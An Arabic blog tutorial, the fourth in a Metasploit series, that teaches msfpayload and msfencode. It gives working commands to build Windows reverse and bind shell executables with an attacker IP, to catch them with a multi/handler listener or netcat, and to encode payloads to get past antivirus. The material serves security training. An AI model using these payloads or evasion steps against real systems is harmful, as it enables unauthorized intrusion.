اتص بنا

مدونة |anonymous ترحب بكم

الخميس، 9 يونيو 2016

الدرس الرابع للميتا سبلوت

السلام عليكم ورحمه الله وبركاته

اليوم درسنآ يكمل الدرس السابق .

1- msfpayload

msfencode -2


msfpayload : اداه مهمه لعمل الـ shellcode

الجميل في الامر ان بأمكانك عمل نفس shellcode لكن بصيغ مختلفه

سواء ja va scrip t ,perl ,C ,exe,ruby, raw, VBA

طريقه عمله .

كود PHP:
./msfpayload payload var=val 
payload = اسم البايلود

var =المتغيرات مثلا lport ويعني البورت الخاص بالمهاجم

كيف نعرف متغيرات الـ payload ؟

نعرفها عن طريق الامر

كود PHP:
 ./msfpayload windows/shell/reverse_tcp  O 
الصوره تتكلم .



local port= lport
البورت الخاص بالمهاجم ,
local host = lhost
ip الخاص بالمهاجم

خذها قاعده بدون تفكير دائما اي البايلود يستخدم اتصال عكسي reverse يحتاج lhost,lport

bind_shell
الحصول على شل بأتصال مباشر

reverse_shell
الحصول على شل بأتصال عكسي

الان نعمل تطبيق .
كود PHP:
 ./msfpayload windows/shell/reverse_tcp lhost=192.168.1.3 C 
[/QUOTE]



الان راح نعمل ملفات exe للاختراق بأستخدام msfpayload ,

البعض يتسائل يقول لماذا استخدم msfpayload لعمل ملفات exe وانا عندي shell access

صحيح عندك شل لكن الشل هذا حصلته عن طريق ثغره خارج الميتاسبلويت , الثغره تطلب مساحه معينه من الـ shellcode صغيره بحيث ما تقبل meterpreter , vncinject

طبعا الان ما فيه الا حل واحد وهو تحميل meterpreter , بكل تأكيد راح يكون exe

كيف نعمله على صيغه exe , بأستخدام mfspayload .

مثال لعمل exe
كود PHP:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X reverse.exe 

طريقه التنصت للاتصال

./
كود PHP:
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E 
msfcli راح اشرحها بدرس القادم .


مثال اخر
كود PHP:
./msfpayload windows/shell_bind_tcp LPORT=4444 X listen.exe 
الان راح نستخدم netcat

nc -vn 192.168.1.2 4444

~~~~~~~~~~~~~~~~

msfencode : اداه تستخدم لتشفير shellcode لتخطي IDS او AV


كود PHP:
Usage: ./msfencode <options>
OPTIONS:

    -
<opt>  The architecture to encode as
    -
<opt>  The list of characters to avoid'\x00\xff'
    
-<opt>  The number of times to encode the data
    
-<opt>  The encoder to use
    -
h        Help banner
    
-<opt>  Encode the contents of the supplied file path
    
-l        List available encoders
    
-<opt>  Specifies an additional module search path
    
-n        Dump encoder information
    
-<opt>  The output file
    
-<opt>  The platform to encode for
    -
<opt>  The maximum size of the encoded data
    
-<opt>  The format to display the encoded buffer 
    
-<opt>  Specify an alternate win32 executable template 

الاداه واضحه جدا لكن راح تنشرح , والشرح راح يكون فديو

قبل مده انا وجدت فديو جميل جدا ويتكلم عن هذه الاداه وكيفيه تخطي

مضاد الفيروسات لمده 24 دقيقه والشرح على الوندوز .

[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]


الان بقى الواجهات
1-msfconsole
msfcli -2
msfgui -3
msfwe b -4


وراح يتم التطرق لها بالدرس القادم .



قبل ما انتهي , راح اعمل اختبار سريع لـ أتأكد انك متابع الدروس معاي وفاهم جميع الدروس !

لماذا لم استخدم msfcli في هذا المثال , مع اني استطيع استخدامه ؟
كود PHP:
./msfpayload windows/shell_bind_tcp LPORT=4444 X listen.exe 
الان راح نستخدم netcat

nc -vn 192.168.1.2 4444

ولماذا > متعوب عليها

استخدمت الاداه msfcli ,واستخدامها الزامي بمعنى اخر ما تتخلى عنها الا اذا عملت نفس الشيء msfconsole وجميعا مثل بعض !


كود PHP:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X reverse.exe 

طريقه التنصت للاتصال

./
كود PHP:
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E 

الجواب راح تلقونه بالدروس السابقه اذا كنت متابع

hint: الجواب 5 كلمات

حياكم الله
تقييم الموضوع:
{[['']]}

شاركه

Hm

Anonymous : من مصر, مختص في الهكرز و البرمجة كذلك التصاميم العامة أعمل حر ,اهتمامي وحبي لتدوين هو ما سوف يجعلني اقدم لكم كل ماهو جديد في عالم بلوجر ومدونة ANONYMOUS تعبر عما اهوى

جميع الحقوق محفوظة 2015 | مدونة Anonymous أعلن معنا رخصة الإستخدام والنشر خريطة الموقع سياسة الخصوصية تصميم :القيسي ويب | الأفضل لكم